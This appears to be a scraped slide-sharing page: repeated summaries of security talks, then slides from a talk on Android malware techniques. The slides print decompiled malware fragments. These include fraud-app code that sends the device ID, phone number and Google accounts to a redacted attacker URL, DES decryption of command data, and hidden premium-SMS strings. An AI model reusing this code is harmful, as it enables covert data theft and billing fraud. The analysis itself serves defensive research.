Attackers are starting to move on from simple attacks, mainly because users are starting to figure out that the free adult entertainment or chat app shouldn't be sending SMS messages to expensive numbers. They're leveraging techniques from PC malware like server-side polymorphism, vulnerability exploits, botnets and network updates, and preemptive/direct attacks against security software.
This document discusses the stages of targeted attacks and the techniques used at each stage. It begins by outlining the 6 main stages of targeted attacks: 1) intelligence gathering, 2) point of entry, 3) command and control communication, 4) lateral movement, 5) data discovery, and 6) data exfiltration. For each stage, it describes common tactics attackers use, such as spearphishing for the point of entry or using encrypted communications over the Tor network for exfiltration. The document emphasizes that comprehensive security measures are needed to detect threats across all stages of attack.
Automotive Cybersecurity: Test Like a Hacker - ForAllSecure
Learn the techniques used by award-winning hacking teams (as well as in some real-world attacks) to identify and exploit vulnerabilities in OEM components and other automotive software. This presentation covers fundamental principles, as well as how to easily incorporate these techniques into unit or functional test stages - bringing an extra layer of protection to connected automobiles. We'll cover how to best fit this type of testing into your pipeline to maximize speed and coverage, and discuss how to fit this offensive cybersecurity approach alongside your existing vulnerability scanning programs. Whether you're a vehicle manufacturer, integrator, or OEM - we'll discuss how to leverage hacking-based security techniques to improve protection across the supply chain and keep vehicles and drivers safer. What we'll cover:
- Successful exploits of components and vehicles - what these attacks had in common
- Layering offensive techniques atop existing security programs - what to do and what to avoid
- How to test integrated systems with multiple components from different OEMs working in tandem
- Integrating offensive testing into different stages in software development and component integration
Originally presented at https://www.automotive-iq.com/events-automotive-cybersecurity
The document summarizes Determina's Vulnerability Protection Suite, which uses patented technology to stop both known and unknown (zero-day) attacks without needing updates, signatures, or behavior modeling. It focuses on vulnerability prevention rather than attack detection. The core technologies include the Managed Program Execution Engine, Memory Firewall, and LiveShield, which provide zero-day endpoint protection.
This document discusses using machine learning to detect ransomware through analyzing microbehaviors rather than static signatures. It introduces the concept of using machine learning for cybersecurity and labeling data to help algorithms learn. The document then discusses modeling ransomware behaviors like file system modifications and callbacks. It outlines a plan to take labeled exploit and benign traffic data, extract microbehaviors, use machine learning to detect anomalies, and generate indicators of compromise.
Jon Noble. Jon will give a brief overview of why you should consider security as part of your CloudStack deployment, why your approach to security needs to be different than in a traditional environment, and also talk about some of the motives behind the attacks – why they attack you and what they do once they have compromised a system.
This document discusses mobile security threats and attacker mindsets. It notes that mobile malware primarily impacts Android due to its fragmented ecosystem and slow patching. Exploitation focuses on gaining control of applications or baseband processors, which have few defenses and high-value data. The document advises software vendors to implement stronger mitigations, developers to better isolate sensitive data, and policymakers to recognize diverse mobile threats and segregate devices from corporate networks. It argues that understanding attacker goals and what data needs protection is key to effective security.
The Internet of Fails - Mark Stanislav, Senior Security Consultant, Rapid7
The Internet of Fails - Where IoT (the Internet of Things) has gone wrong and how we’re making it right. By Mark Stanislav @mstanislav, Senior Security Consultant, Rapid7
Web security involves protecting information transmitted over the internet from attacks like viruses, worms, trojans, ransomware, and keyloggers. Users can help secure themselves by using antivirus software, avoiding phishing scams, and reporting spam. Larger attacks often involve botnets, which are networks of infected computers that can overwhelm websites and services with traffic through distributed denial of service attacks.
Secure Software: Action, Comedy or Drama? (2017 edition) - Peter Sabev
If they made movies about the most important software security issues, they could be put under five titles: Insecure Interface, Insufficient Authentication, Security Misconfiguration, Lack of Transport Encryption and Privacy Concerns. What are the action, comedy and drama parts of software security nowadays? A talk presented at the IT-Weekend event in Ruse, Bulgaria (2017).
SANSFIRE18: War Stories on Using Automated Threat Intelligence for Defense - John Bambenek
Between limited resources and a lack of trained professionals on one hand and the increasing quantity and quality of attacks on the other, securing enterprises and responding to incidents has placed defenders on the losing end of a digital arms race. Even managing the amounts of threat data and open-source intelligence has become a challenge.
This talk will cover the possibilities and perils of integrating all the various sources of threat intelligence data to protect an organization. With all the various open-source and paid-source data, simply dumping it all into a firewall or DNS RPZ zone can be problematic. What to do about compromised websites or shared hosting environments? What about DGA domains that use full words and may collide with actual innocent websites? What about how to handle threat data that is lacking in context to make appropriate decisions on its validity and accuracy? This talk will present several case studies in how these problems can be tackled and how using multi-domain analysis can help reduce the risk and maximize the value of automated protection using these types of data.
The document discusses cybersecurity issues related to IoT devices. It begins by describing the 2016 Mirai botnet attacks, which exploited vulnerabilities in IoT devices like IP cameras and DVRs to take down major websites. The document then analyzes the current security situation of IoT, finding that many devices have vulnerabilities due to a lack of focus on security by manufacturers. It also notes that IoT devices could potentially be used as "weapons of mass destruction" due to their ubiquity, connectivity and potential access to users' daily lives. The rest of the document examines common vulnerabilities and attack vectors in IoT devices.
How to hide your browser 0-day @ Disobey - Zoltan Balazs
1. The document describes a method called #IRONSQUIRREL for delivering browser exploits in an encrypted format using elliptic curve Diffie-Hellman key exchange to prevent detection and analysis.
2. It was implemented in exploit kits like Angler to prevent reverse engineering of zero-day exploits and leakage of exploit code. The encrypted delivery prevents network-based detection and replay of the exploit.
3. The document provides details on how #IRONSQUIRREL works and improves on previous encrypted delivery methods. It also discusses challenges and techniques for analysts to detect and analyze such encrypted exploits, as well as recommendations for attackers to strengthen #IRONSQUIRREL against analysis.
The State of Credential Stuffing and the Future of Account Takeovers - Jarrod Overson
Jarrod Overson discusses the evolution of credential stuffing attacks and where they may go in the future. He summarizes that credential stuffing started as basic automated login attempts but has evolved through generations as defenses were put in place, such as CAPTCHAs and behavior analysis. The next generation involves more sophisticated imitation attacks that flawlessly emulate human behavior using real device fingerprints to blend in. Beyond credential stuffing, malware may start scraping user accounts and environments directly from infected machines. As defenses raise the cost of attacks, fraudsters will diversify methods to preserve the value of valid accounts and user data.
Hacking is a term used to refer to activities aimed at exploiting security flaws to obtain critical information for gaining access to secured networks.
Cracking Into Embedded Devices - HACK.LU 2K8 - guest441c58b71
The document discusses offensive techniques for compromising embedded devices, focusing on exploiting vulnerabilities in HTTP, UPnP, SNMP, and Wi-Fi to gain remote access. Many examples are provided of specific devices that were compromised through bugs like cross-site request forgery, privilege escalation flaws, and password leaks. The goal of the research is to show how embedded devices are easier to hack than general purpose systems and can be used as stepping stones into internal corporate networks.
Your Peripheral Has Planted Malware—An Exploit of NXP SOCs Vulnerability - Priyanka Aash
"There are billions of ARM Cortex M based SOCs being deployed in embedded systems. Most of these devices are Internet ready and definitely security is always the main concern. Vendors would always apply security measurements into the ARM Cortex M product for a few major reasons: 1) People will not be able to copy and replicate the product; 2) License control for the hardware and software; 3) Prevent malicious code injection into the firmware. Vendors normally rely on the security measurements built within the chip (unique ID number/signature) or security measurements built around the chip (secure boot).
In this talk, we will share the ARM Cortex M SOC vulnerability that we discovered, and it will be in two parts:
The first is the security measurement built within the SOC and how we break it. We could gain control of changing the SOC unique ID and write the firmware or even turn the device into a trojan or bot.
The second is the security measure built around the SOC and how we break the Secure Boot elements and write into the firmware."
TheFatRat is an easy tool to generate backdoors with msfvenom (part of the Metasploit Framework) and to perform post-exploitation attacks. This tool compiles malware with a popular payload, and the compiled malware can then be executed on Android, Windows and Linux. The malware created with this tool also has the ability to bypass most AV software protection. Bypassing the anti-virus or security software allows a Metasploit session between the attacker and the target without the anti-virus detecting the malicious payload and flagging a warning back to the user.
This document discusses hacking and methods for defending against it. It provides background on common hacking techniques like smurfing and spoofing. It also lists estimated costs of major computer worms and viruses. The document demonstrates hacking methodology, including gathering target information, identifying services, exploiting vulnerabilities, and preventing attacks. It recommends defenses like firewalls, intrusion detection systems, and keeping software patched.
The document discusses penetration testing using Metasploit. It begins by defining penetration testing and why it is important for security. It then provides an overview of Metasploit, explaining what it is and some key terminology. The document demonstrates a sample penetration test against a virtual network, using Metasploit to exploit a Windows vulnerability. It evaluates the impact and recommends countermeasures like patching, code reviews, and periodic testing. The goal is to show how Metasploit can be used to test network security by simulating real-world attacks.
This document contains a presentation on cyber security, ethical hacking, and penetration testing. It discusses various cyber threats like hacking, malware, and phishing. It then provides details on mobile hacking using AndroRAT to remotely control an Android phone. It also covers social media hacking techniques and how to conduct phishing attacks on sites like Facebook. The document concludes with a section on ransomware that demonstrates encrypting and decrypting files with a Python script.
This document discusses the topic of computer hacking. It begins by defining hacking and discussing the different types of hackers, including white hat, black hat, and gray hat hackers. It then covers hacking techniques such as port scanning, social engineering, and brute force attacks. The document provides an overview of how hackers operate and highlights both advantages and disadvantages of hacking.
Presentation by Saurabh Harit at the mobile security summit in Johannesburg, 2011.
This presentation is about security on the iPhone and Android platforms. The presentation begins with a discussion on decrypting iPhone apps and its implications. The Android security model is discussed. The presentation ends with a series of discussions on practical Android attacks.
Digital Signage Systems - The Modern Hacker's Outreach - Zero Science Lab
The document provides information on several digital signage systems and related security issues, including:
1) Eight cases of vulnerabilities found in different digital signage systems are described, such as remote code execution, SQL injection, authentication bypass, and more.
2) Common attack vectors for digital signage systems are explained, including exposed management interfaces, known vulnerabilities, default or hard-coded credentials, lack of authentication and authorization, and more.
3) Details are given on specific exploits against systems like Cayin, QiHang Media, UBICOD Medivision, and others, demonstrating privilege escalation, unauthorized file access and deletion, and in some cases gaining full remote code execution.
Can't touch this: cloning any Android HCE contactless card - Slawomir Jasek
There is no doubt that mobile contactless payments have grown exponentially, and Host Card Emulation – the possibility to emulate payment cards on a mobile device without depending on special Secure Element hardware – has also significantly boosted the number of applications.
HCE support for Android is usually delivered as an external, certified “black-box” library to compile into your application. Obviously vendors promise the “highest level of security” – including card data tokenization, a “secure element in the cloud”, device fingerprinting, a phone-unlock requirement, code obfuscation, additional authorization, etc. For mobile payments, they often successfully convince the implementing bank that it is technically impossible to “clone” a virtual card from the owner’s device to another one.
Based on several assessments, we have noticed that even IT security representatives were surprised by the possibilities for mobile malware to attack the process. Not to mention risk departments, which took into consideration only a few limited-value fraudulent transactions made by an accidental thief using a stolen phone. Therefore, delivering the PoC demo of card cloning to a different device caused confusion and uncertainty at the least, every time. Furthermore, proving that the intruder is also able to renew virtual card tokens, or make payments for higher amounts, turned out to be a shock.
With the introduction of root-exploiting financial malware, attackers already have the technical means to attack HCE. Therefore it is now crucial to understand the associated risks and properly plan mitigation ahead. This presentation will start with a short introduction to HCE – including “ISIS”’s role in its complicated history, current coverage and growth predictions, basics of operation, typical infrastructure and differences from a hardware Secure Element. We will cover several possibilities to attack HCE, including a universal method of cloning any Android contactless payment (including Google’s own Android Pay) to a different device. Several layers of security mechanisms to mitigate the risk will be presented, along with some statistics on the methods used by current applications. The audience will leave with a deep understanding of HCE technology and its limitations, along with exemplary solutions to potential problems.
Brick all the internet of things! (with notes) - Jimmy Shah
Recently someone released a worm on the Internet that targeted IoT devices. In the past similar worms turned your Internet connected cameras and DVRs into nodes in a massive botnet. This time it used the same entry points into your devices to brick them. The better to prevent them from possibly being turned into weapons of mass denial of service.
We'll cover why that's a Bad Idea. And what are more constructive ways to get IoT/Internet-enabled embedded device manufacturers and vulnerability researchers to sit down at the same table.
There's no S(ecurity) in IoT: This is why we can't sleep - Jimmy Shah
IoT devices are embedded systems. Essentially "[a] computer small enough to fit in a pocket". One wouldn’t put a computer on the Internet without at least considering securing it, yet security for IoT devices is quite often an afterthought.
More related content
Similar to Isn't it all just SMS-sending trojans?: Real Advances in Android Malware
The Internet of Fails - Mark Stanislav, Senior Security Consultant, Rapid7Rapid7
The Internet of Fails - Where IoT (the Internet of Things) has gone wrong and how we’re making it right. By Mark Stanislav @mstanislav, Senior Security Consultant, Rapid7
Web security involves protecting information transmitted over the internet from attacks like viruses, worms, trojans, ransomware, and keyloggers. Users can help secure themselves by using antivirus software, avoiding phishing scams, and reporting spam. Larger attacks often involve botnets, which are networks of infected computers that can overwhelm websites and services with traffic through distributed denial of service attacks.
Secure Software: Action, Comedy or Drama? (2017 edition)Peter Sabev
If they made movies about the most important software security issues, they could be put into five titles: Insecure Interface, Insufficient Authentication, Security Misconfiguration, Lack of Transport Encryption and Privacy Concerns. What are the action, comedy and drama parts in software security nowadays? A talk presented on IT-Weekend event in Ruse, Bulgaria (2017)
SANSFIRE18: War Stories on Using Automated Threat Intelligence for DefenseJohn Bambenek
Between limited resources and a lack of trained professionals on one hand and the increasing quantity and quality of attacks on the other, securing enterprises and responding to incidents has placed defenders on the losing end of a digital arms race. Even managing the amounts of threat data and open-source intelligence has become a challenge.
This talk will cover the possibilities and perils of integrating all the various sources of threat intelligence data to protect an organization. With all the various open-source and paid-source data, simply dumping it all into a firewall or DNS RPZ zone can be problematic. What to do about compromised websites or shared hosting environments? What about DGA domains that use full words and may collide with actual innocent websites? What about how to handle threat data that is lacking in context to make appropriate decisions on its validity and accuracy? This talk will present several case studies in how these problems can be tackled and how using multi-domain analysis can help reduce the risk and maximize the value of automated protection using these types of data.
The document discusses cybersecurity issues related to IoT devices. It begins by describing the 2016 Mirai botnet attacks, which exploited vulnerabilities in IoT devices like IP cameras and DVRs to take down major websites. The document then analyzes the current security situations of IoT, finding that many devices have vulnerabilities due to a lack of focus on security by manufacturers. It also notes that IoT devices could potentially be used as "weapons of mass destruction" due to their ubiquity, connectivity and potential access to users' daily lives. The rest of the document examines common vulnerabilities and attack vectors in IoT devices.
How to hide your browser 0-day @ DisobeyZoltan Balazs
1. The document describes a method called #IRONSQUIRREL for delivering browser exploits in an encrypted format using elliptic curve Diffie-Hellman key exchange to prevent detection and analysis.
2. It was implemented in exploit kits like Angler to prevent reverse engineering of zero-day exploits and leakage of exploit code. The encrypted delivery prevents network-based detection and replay of the exploit.
3. The document provides details on how #IRONSQUIRREL works and improves on previous encrypted delivery methods. It also discusses challenges and techniques for analysts to detect and analyze such encrypted exploits, as well as recommendations for attackers to strengthen #IRONSQUIRREL against analysis.
The State of Credential Stuffing and the Future of Account Takeovers.Jarrod Overson
Jarrod Overson discusses the evolution of credential stuffing attacks and where they may go in the future. He summarizes that credential stuffing started as basic automated login attempts but has evolved through generations as defenses were put in place, such as CAPTCHAs and behavior analysis. The next generation involves more sophisticated imitation attacks that flawlessly emulate human behavior using real device fingerprints to blend in. Beyond credential stuffing, malware may start scraping user accounts and environments directly from infected machines. As defenses raise the cost of attacks, fraudsters will diversify methods to preserve the value of valid accounts and user data.
Hacking is a term used to refer to activities aimed at exploiting security flaws to obtain critical information for gaining access to secured networks.
Cracking Into Embedded Devices - HACK.LU 2K8guest441c58b71
The document discusses offensive techniques for compromising embedded devices, focusing on exploiting vulnerabilities in HTTP, UPnP, SNMP, and Wi-Fi to gain remote access. Many examples are provided of specific devices that were compromised through bugs like cross-site request forgery, privilege escalation flaws, and password leaks. The goal of the research is to show how embedded devices are easier to hack than general purpose systems and can be used as stepping stones into internal corporate networks.
Your Peripheral Has Planted Malware—An Exploit of NXP SOCs VulnerabilityPriyanka Aash
"There are billions of ARM Cortex M based SOC being deployed in embedded systems. Most of these devices are Internet ready and definitely security is always the main concern. Vendors would always apply security measurements into the ARM Cortex M product for few major reasons: 1) People will not be able to copy and replicate the product; 2) License control for the hardware and software; 3) Prevent malicious code injection in to the firmware. Vendors normally rely on the security measurements built within the chip (unique ID number/signature) or security measurements built around the chip (secure boot).
In this talk, we will share the ARM Cortex M SOC vulnerability that we discovered and it will be two parts:
The first is security measurement build within the SOC and how we break it. We could gain control of changing the SOC unique ID and write the firmware or even turn the device into a trojan or bot.
The second is security measure built around the SOC and how we break the Secure Boot elements and write into the firmware."
The TheFatrat is an easy tool to generate backdoor’s with msfvenom (a part
from metasploit framework) and easy post exploitation attack. This tool
compiles a malware with popular payload and then the compiled malware can
be execute on android, windows, Linux. The malware that created with this tool
also have an ability to bypass most AV software protection. Bypassing the Anti-
Virus or Security Software will allow for a metasploit session between the
attacker and the target without Anti-Virus detecting the malicious payload and
flagging a warning back to the user.
This document discusses hacking and methods for defending against it. It provides background on common hacking techniques like smurfing and spoofing. It also lists estimated costs of major computer worms and viruses. The document demonstrates hacking methodology, including gathering target information, identifying services, exploiting vulnerabilities, and preventing attacks. It recommends defenses like firewalls, intrusion detection systems, and keeping software patched.
The document discusses penetration testing using Metasploit. It begins by defining penetration testing and why it is important for security. It then provides an overview of Metasploit, explaining what it is and some key terminology. The document demonstrates a sample penetration test against a virtual network, using Metasploit to exploit a Windows vulnerability. It evaluates the impact and recommends countermeasures like patching, code reviews, and periodic testing. The goal is to show how Metasploit can be used to test network security by simulating real-world attacks.
This document contains a presentation on cyber security, ethical hacking, and penetration testing. It discusses various cyber threats like hacking, malware, and phishing. It then provides details on mobile hacking using AndroRAT to remotely control an Android phone. It also covers social media hacking techniques and how to conduct phishing attacks on sites like Facebook. The document concludes with a section on ransomware that demonstrates encrypting and decrypting files with a Python script.
This document discusses the topic of computer hacking. It begins by defining hacking and discussing the different types of hackers, including white hat, black hat, and gray hat hackers. It then covers hacking techniques such as port scanning, social engineering, and brute force attacks. The document provides an overview of how hackers operate and highlights both advantages and disadvantages of hacking.
Presentation by Saurabh Harit att he mobile security summit in johannesburg 2011.
This presentation is about security on the iPhone and Android platforms. The presentation begins with a discussion on decrypting iPhone apps and its implications. The Android security model is discussed. The presentation ends with a series of discussions on practical Android attacks.
Digital Signage Systems - The Modern Hacker's OutreachZero Science Lab
The document provides information on several digital signage systems and related security issues, including:
1) Eight cases of vulnerabilities found in different digital signage systems are described, such as remote code execution, SQL injection, authentication bypass, and more.
2) Common attack vectors for digital signage systems are explained, including exposed management interfaces, known vulnerabilities, default or hard-coded credentials, lack of authentication and authorization, and more.
3) Details are given on specific exploits against systems like Cayin, QiHang Media, UBICOD Medivision, and others, demonstrating privilege escalation, unauthorized file access and deletion, and in some cases gaining full remote code execution.
Can't touch this: cloning any Android HCE contactless card (Slawomir Jasek)
There is no doubt that mobile contactless payments have grown exponentially, and Host Card Emulation – the possibility to emulate payment cards on a mobile device without depending on special Secure Element hardware – has also significantly boosted the number of applications.
HCE support for Android is usually delivered as an external, certified “black-box” library to compile into your application. Obviously vendors promise the “highest level of security” – including card data tokenization, a “secure element in the cloud”, device fingerprinting, a phone-unlock requirement, code obfuscation, additional authorization, etc. For mobile payments, they often successfully convince the implementing bank that it is technically impossible to “clone” a virtual card from the owner’s device to another one.
Based on several assessments, we have noticed that even IT security representatives were surprised by the possibilities of mobile malware to attack the process. Not to mention risk departments, which took into consideration only a few limited-value fraudulent transactions made by an accidental thief using a stolen phone. Therefore, delivering the PoC demo of card cloning to a different device caused confusion and uncertainty every time, to say the least. Furthermore, proving that the intruder is also able to renew virtual card tokens, or make payments for higher amounts, turned out to be a shock.
With the introduction of root-exploiting financial malware, attackers already have the technical means to attack HCE. Therefore it is now crucial to understand the associated risks and properly plan mitigation ahead. This presentation will start with a short introduction to HCE – including “ISIS”’s role in its complicated history, current coverage and growth predictions, basics of operation, typical infrastructure and differences from a hardware Secure Element. We will cover several possibilities to attack HCE, including a universal method of cloning any Android contactless payment (including Google’s own Android Pay) to a different device. Several layers of security mechanisms to mitigate the risk will be presented along with some statistics on methods used by current applications. The audience will leave with a deep understanding of HCE technology and its limitations, along with exemplary solutions to potential problems.
Similar to Isn't it all just SMS-sending trojans?: Real Advances in Android Malware (20)
Brick all the internet of things! (with notes) (Jimmy Shah)
Recently someone released a worm on the Internet that targeted IoT devices. In the past, similar worms turned your Internet-connected cameras and DVRs into nodes in a massive botnet. This time it used the same entry points into your devices to brick them, the better to prevent them from possibly being turned into weapons of mass denial of service.
We'll cover why that's a Bad Idea, and what more constructive ways there are to get IoT/Internet-enabled embedded device manufacturers and vulnerability researchers to sit down at the same table.
There's no S(ecurity) in IoT: This is why we can't sleep (Jimmy Shah)
IoT devices are embedded systems. Essentially "[a] computer small enough to fit in a pocket". One wouldn’t put a computer on the Internet without at least considering securing it, yet security for IoT devices is quite often an afterthought.
BYOD is now BYOT (Bring Your Own Threat) – Current Trends in Mobile APT (Jimmy Shah)
Mobile devices are not simply PCs. While one knows to look for an Advanced Persistent Threat (APT) on their desktop endpoints, mobile tends to be ignored. Setting up an MDM solution is not enough. Installing AV on as many devices as possible is not enough. The holes in the net are still too wide; attackers have more options than just malicious apps for getting on your network.
Topics covered will be:
How attackers are moving to mobile in order to bypass traditional protection.
Apps are only one part of the problem. Documents, email, messaging are still left wide open
Bypassing Mobile Antivirus
Bypassing MDM, MAM and Containers
Attackers are turning from apps to exploits.
Finally we’ll cover what to do next – how to effectively deal with Mobile APT.
Solar Powered Parking Meters - An IoT thought experiment (Jimmy Shah)
The Internet of Things is not as complex as one would think. Objects (e.g. power meters, fridge computers, etc.) or "Things" don't have their own Internet; instead they "speak" to each other over the same Internet we all use. There lies their vulnerability: the assumption that, since the machines will only talk to each other, no one will eavesdrop or intrude on their conversation. Security researchers have a saying, "Security through Obscurity is no Security".
The presentation shows how the Internet of Things' veil of obscurity can be pierced, by walking through how an attacker (or more likely a security researcher) would assess a particular Smart Parking Meter ecosystem. Only open source intelligence (OSINT) [e.g. patents, newspaper articles] was used to compile the information on:
* parking meters
* mesh networking
* machine2machine(m2m) SIMs
* management consoles
* RF usage
Mobile malware analysis with the A.R.E. VM (Jimmy Shah)
This document describes tools included in the Android Reverse Engineering (A.R.E.) virtual machine from the Honeynet Project for analyzing Android malware. The A.R.E. VM includes tools for decompiling Android apps, disassembling Dalvik bytecode, inspecting app files and permissions, and monitoring apps dynamically in an instrumented Android virtual machine. It allows static and dynamic analysis of Android apps to identify malicious behavior and understand app functionality.
Viruses on mobile platforms: why we don't/don't we have viruses on Android (Jimmy Shah)
This presentation will discuss the resources available to attackers to write Android viruses, including methods of infecting executables, gaining control from the original app and avoiding detection.
Mobile malware heuristics: the path from 'eh' to 'pretty good' (Jimmy Shah)
The 'Platypus' talk
Malware on mobile phones is rapidly increasing. There are many reasons for this, but the primary one is the ease of monetizing malware on mobile phones. Attackers are incentivized to create more malware faster and cheaper. They are overwhelming the limited resources of malware researchers with this glut of cheap and "good enough" malware. Malware can be identified by humans, but there is insufficient time to handle all that is released daily by malware writers. There is a need to develop both better heuristics and the tools that let an analyst separate the wheat from the chaff. The presentation will cover not just the development of heuristics for mobile malware, but also its path from simple detection to more advanced and more successful (i.e. fewer false positives) detection. Along the way we will cover the missteps and pitfalls that slow the development of automation.
Smartphone Ownage: The state of mobile botnets and rootkits (Jimmy Shah)
This document discusses mobile botnets and rootkits. It begins by introducing the author and their work in mobile malware analysis. Various examples of existing mobile malware are provided, including botnets that coordinate infected devices and rootkits that hide on phones. The document outlines characteristics of botnets like command and control and how they are used for attacks. It also defines rootkits and provides examples found in the wild for Symbian and other mobile platforms. Finally, it discusses the potential for future mobile botnets and rootkits as the capabilities of smartphones increase.
Isn't it all just SMS-sending trojans?: Real Advances in Android Malware
1. McAfee Confidential—Internal Use Only
Isn't it all just SMS-sending trojans?:
Real advances in Android Malware
Jimmy Shah
Mobile Security Researcher
6. Attacker Tricks - Encryption
• Simple
– Obfuscations
• Hiding SMS numbers/message text within plaintext HTML files
– Substitution cipher
• Config file containing encrypted SMS numbers/message text
<link rel="stylesheet" type="text/css" href="/en/shared/core/2/css/css.ashx?sc=/en/us/site.config&pt=cspMscomHomePage&c=cspMscomSiteBrand;cspSearchComponent;cspMscomFeaturePanel;cspMscomMasterNavigation;[<SMS#>:<MSG>]cspMscomNewsBand;cspVerticalRolloverTab;cspAdControl;cspMscomVerticalTab;cspSilverGate" /><script type="text/javascript" src="http//i3.microsoft.com/library/svy/broker.js"></script>
<meta name="SearchTitle" content="Microsoft.com" scheme="" /><meta name="Description" content="Get product information, support, and news from Microsoft." scheme="" /><meta name="Title" content="Microsoft.c
<SMS#>::<MSG>::241.55руб.
<SMS#>::<MSG>::173.88руб.
<SMS#>::<MSG>::86.00руб.
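An analyst-side extractor for the two hiding spots shown on this slide, written as an added example (not code from the deck or from McAfee): it pulls `[<SMS#>:<MSG>]` pairs spliced into HTML and parses `<SMS#>::<MSG>::<price>` config lines, scanning every text asset of an unpacked APK. The sample HTML, numbers, messages and prices are constructed placeholders, since the deck redacts the real ones.

```python
import re
from typing import Dict, List, Tuple

# Hidden-in-HTML trick from the slide: the premium number and message are spliced
# into an otherwise benign attribute value as [<SMS#>:<MSG>].
HTML_EMBED_RE = re.compile(r"\[(\d{3,8}):([^\[\]:]{1,160})\]")

# Config-file trick from the slide: one entry per line as <SMS#>::<MSG>::<price>,
# with an optional currency suffix such as "руб.".
CONFIG_LINE_RE = re.compile(r"^(\d{3,8})::(.+?)::(\d+(?:[.,]\d+)?)\s*([^\d\s]+)?$")

def find_embedded_sms(html: str) -> List[Tuple[str, str]]:
    """Return (number, message) pairs spliced into an HTML/text blob."""
    return [(m.group(1), m.group(2)) for m in HTML_EMBED_RE.finditer(html)]

def parse_sms_config(text: str) -> List[Dict[str, str]]:
    """Parse number::message::price lines; anything else (comments, markup) is ignored."""
    entries = []
    for line in text.splitlines():
        m = CONFIG_LINE_RE.match(line.strip())
        if m:
            entries.append({"number": m.group(1), "message": m.group(2),
                            "price": m.group(3), "currency": m.group(4) or ""})
    return entries

def scan_assets(files: Dict[str, bytes]) -> List[Dict[str, str]]:
    """Run both extractors over every text asset of an unpacked APK; binaries are skipped."""
    findings = []
    for path, data in files.items():
        try:
            text = data.decode("utf-8")
        except UnicodeDecodeError:
            continue  # not text (e.g. a packed exploit or image): nothing to regex here
        for number, msg in find_embedded_sms(text):
            findings.append({"file": path, "kind": "html-embedded",
                             "number": number, "message": msg})
        for entry in parse_sms_config(text):
            findings.append({"file": path, "kind": "config-line", **entry})
    return findings

# Constructed samples: numbers, messages and prices are placeholders, not real ones.
SAMPLE_HTML = (
    '<link rel="stylesheet" href="/css.ashx?c=cspMscomSiteBrand;cspSearchComponent;'
    'cspMscomFeaturePanel;[4321:sub on]cspMscomNewsBand;cspAdControl" />'
    '<meta name="Title" content="Microsoft.com" />'
)
SAMPLE_CONFIG = "4321::sub on::241.55руб.\n4321::sub off::173.88руб.\n# not an entry\n"
SAMPLE_APK = {
    "assets/index.html": SAMPLE_HTML.encode("utf-8"),
    "assets/cfg.txt": SAMPLE_CONFIG.encode("utf-8"),
    "res/raw/blob": b"\x7fELF\xff\xfe",  # non-UTF-8 bytes: skipped, not crashed on
}

if __name__ == "__main__":
    for finding in scan_assets(SAMPLE_APK):
        print(finding)
```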
7. Attacker Tricks - Encryption
• Complex
– Symmetric cipher
• DES
• Encrypt URL queries and C&C commands
• Encrypt/decrypt config file
– URLs, next connect time
– Encrypt/decrypt C&C commands
– Decrypt root exploits
import javax.crypto.Cipher;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.DESKeySpec;

// Decompiled DES setup from the sample: the key is a hard-coded byte array in a static field (k.b)
byte abyte1[] = k.b;
DESKeySpec deskeyspec = new DESKeySpec(abyte1);
javax.crypto.SecretKey secretkey = SecretKeyFactory.getInstance("DES").generateSecret(deskeyspec);
Cipher cipher = Cipher.getInstance("DES");
b = cipher; // cipher instance kept in a field for later C&C/config use
cipher.init(2, secretkey); // mode 2 == Cipher.DECRYPT_MODE
8. Attacker Tricks – Fraud
• Pretending to be a legitimate app
– Not the same as injecting malicious code
– New or reused code that simulates the real app
• Includes malicious functions
• Almost just malicious code
./com/example/android/service/KitchenTimerService$KitchenTimerBinder.class
./com/example/android/service/R$id.class
./com/example/android/service/R$raw.class
./com/example/android/service/Main$KitchenTimerReceiver.class
./com/example/android/service/KitchenTimerService$2.class
./com/example/android/service/R$attr.class
./com/example/android/service/R$layout.class
./com/example/android/service/R.class
./com/example/android/service/Main.class
./com/example/android/service/R$drawable.class
./com/example/android/service/KitchenTimerService$1.class
./com/example/android/service/KitchenTimerService.class
./com/example/android/service/Main$1.class
./com/example/android/service/R$string.class
./token/bot/StartSettings.class
./token/bot/WebApi.class
./token/bot/CatchResult.class
./token/bot/SendSmsResult.class
./token/bot/SettingsSet.class
./token/bot/ScreenItem.class
./token/bot/AutorunReceiver.class
./token/bot/ServerResponse.class
./token/bot/MainActivity.class
./token/bot/ThreadOperation.class
./token/bot/AlarmReceiver.class
./token/bot/ThreadOperationListener.class
./token/bot/SmsReciver.class
./token/bot/MainApplication.class
./token/bot/MainService.class
./token/bot/SmsItem.class
./token/bot/HttpParam.class
./token/bot/Settings.class
./token/bot/UpdateActivity.class
./token/bot/MainActivity$1.class
Android/OneClickFraud (the com/example/android/service KitchenTimer classes above)
Android/FakeToken (the token/bot classes above)
10. Attacker Tricks – Fraud
• Android/OneClickFraud
– Fake adult entertainment app
• App asks for the user to pay for a subscription to the adult site
– Repeats every 5 minutes
public void onReceive(Context paramContext, Intent paramIntent)
{
kitchenTimerService.schedule(300000L);
setContentView(2130903040);
Account[] arrayOfAccount;
11. Attacker Tricks – Fraud
• Android/OneClickFraud
– Sends user information including Google account to the attacker
if (ctf.intValue() == 0)
{
Main localMain = Main.this;
Integer localInteger = Integer.valueOf(1);
localMain.ctf = localInteger;
TelephonyManager localTelephonyManager = (TelephonyManager)getSystemService("phone");
arrayOfAccount = AccountManager.get(Main.this).getAccounts();
str1 = "";
int i = arrayOfAccount.length;
j = 0;
if (j >= i)
{
String str2 = doPost("http://<removed>", "");
StringBuilder localStringBuilder1 = new StringBuilder("http://<removed>");
String str3 = localTelephonyManager.getDeviceId();
StringBuilder localStringBuilder2 = localStringBuilder1.append(str3).append("&telno=");
String str4 = localTelephonyManager.getLine1Number();
Uri localUri1 = Uri.parse(str4 + "&m_addr=" + str1 + "&usr_id=" + str2);
Intent localIntent1 = new Intent("android.intent.action.VIEW", localUri1);
startActivity(localIntent1);
boolean bool = moveTaskToBack(1);
}
}
12. Attacker Tricks - Injecting code (4/19/12)
• Android/Moghava.A
– Malicious code injected into a legitimate app
• Recipes for Iranian meals
13. Attacker Tricks - Injecting code
• Android/Moghava.A
– Real virus
• Overwriting file infector
– Not executable files, just image files
» Specifically all of your JPGs
» Designed to “photo bomb” all your photos with the Ayatollah Khomeini
• Code injection:
– Buggy
• Doesn't check if it's infected a file before
./com/Moghava/kicker.smali
./com/Moghava/stamper$1.smali
./com/Moghava/stamper$1$1.smali
./com/Moghava/stamper.smali
./ir/sharif/iranianfoods/R$attr.smali
./ir/sharif/iranianfoods/R$styleable.smali
